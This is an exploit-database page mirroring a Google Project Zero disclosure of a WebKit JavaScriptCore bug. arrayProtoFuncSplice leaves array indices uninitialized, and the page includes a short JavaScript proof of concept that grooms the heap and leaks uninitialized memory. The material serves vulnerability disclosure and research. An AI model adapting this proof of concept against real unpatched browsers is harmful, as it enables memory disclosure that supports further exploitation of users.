Lucene search
K

WebKit JSC - arrayProtoFuncSplice does not Initialize all Indices Exploit

šŸ—“ļøĀ 17 Jun 2017Ā 00:00:00Reported byĀ Google Security ResearchTypeĀ 
zdt
Ā zdt
šŸ”—Ā 0day.todayšŸ‘Ā 35Ā Views

WebKit JSC - arrayProtoFuncSplice Uninitialized Index Exploi

Related
Code
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1218&desc=2
 
Here's a snippet of arrayProtoFuncSplice.
 
EncodedJSValue JSC_HOST_CALL arrayProtoFuncSplice(ExecState* exec)
{
    ...
            result = JSArray::tryCreateForInitializationPrivate(vm, exec->lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(ArrayWithUndecided), actualDeleteCount);
            if (!result)
                return JSValue::encode(throwOutOfMemoryError(exec, scope));
             
            for (unsigned k = 0; k < actualDeleteCount; ++k) {
                JSValue v = getProperty(exec, thisObj, k + actualStart);
                RETURN_IF_EXCEPTION(scope, encodedJSValue());
                if (UNLIKELY(!v)) {
                    continue;
                }
                result->initializeIndex(vm, k, v);
            }
    ...
}
 
|JSArray::tryCreateForInitializationPrivate| will return an uninitialized JSArray. So the next routine must clear its all indices. But the routine skips holes in |thisObj|. This is fine under normal circumstances because the type of |result| will be ArrayWithUndecided, unless you're having a bad time. We can force |result|'s type to ArrayWithSlowPutArrayStorage by using |JSGlobalObject::haveABadTime|.
 
PoC:
-->
 
function gc() {
    for (let i = 0; i < 0x10; i++)
        new ArrayBuffer(0x1000000);
}
 
Array.prototype.__defineGetter__(0x1000, () => 1);
 
gc();
 
for (let i = 0; i < 0x100; i++) {
    new Array(0x100).fill(1234.5678);
}
 
gc();
 
print(new Array(0x100).splice(0));

#  0day.today [2018-02-15]  #

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Jun 2017 00:00Current
8.3High risk
Vulners AI Score8.3
EPSS0.06301
35